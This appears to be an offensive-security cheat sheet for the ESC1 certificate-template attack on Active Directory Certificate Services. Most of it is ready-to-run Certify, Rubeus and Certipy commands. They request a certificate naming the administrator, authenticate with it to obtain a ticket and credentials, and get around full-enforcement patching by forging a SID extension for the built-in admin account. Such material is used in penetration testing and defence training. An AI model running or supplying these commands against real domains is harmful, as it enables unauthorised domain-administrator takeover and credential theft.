ESC1
For this technique to work we need a certificate template with the following requirements:
-
ENROLLEE_SUPPLIES_SUBJECT
attribute enabled: this allows the user that initialized the CSR (certificate request) to specify any SAN (subjectAltName) allowing us to request a certificate as any user in the domain - at least one of the following EUK OIDs: Smart Card Logon / PKINIT Authentication / Client Authentication
- a user that with enrollment rights
Windows
Certificate Request with alternative SAN
PS /home/bobbuilder> .\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:Template1 /altname:administrator@lab.local
Convert the certificate PEM
to pfx
Certificate Authentification
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap
Linux
Certificate Request with alternative SAN
bobbuilder$ certipy req -u user1@local.lab -p "pass1" -ca lab-LOCAL-DC-CA -template Template1 -upn administrator@local.lab -dc-ip 10.10.10.10
bobbuilder$ certipy req -u user1@local.lab -p 'pass1' -ca lab-LOCAL-DC-CA -upn Administrator -template Template1 -dc-ip 10.10.10.10
Note: If we get an error: The NETBIOS connection with the remote host timed out
, just try again.
Certificate Authentification
bobbuilder$ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
CBAESC1 Patchesin CBA-Patched Environments
When working in an environment in which the CBA (Certificate-based Authentication) patch is set to Full Enforcement, whenever a user requests a certificate for an alternate user, the SID of the requesting user is checked against the SID present in the one present in the szOID_NTDS_CA_SECURITY_EXT extension: if there is no match this technique cannot be performed. So in fully patched environment, the normal
PS /home/otter> .\Rubeus.exe asktgt /user:administrator /domain:minions.com /certificate:'C:\Temp\esc1.pfx' /password:'SomethingSecure123!' /dc:dc.minions.com /nowrap /ptt
would not work.
To work around this policy we can use Certipy's built-in sidextension
argument (present in Certipy as well under extensionsid
)
PS /home/otter> .\Certify.exe /ca:minions.com\CA-minions /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:minions.com
You can see more about how the extension works and its uses here.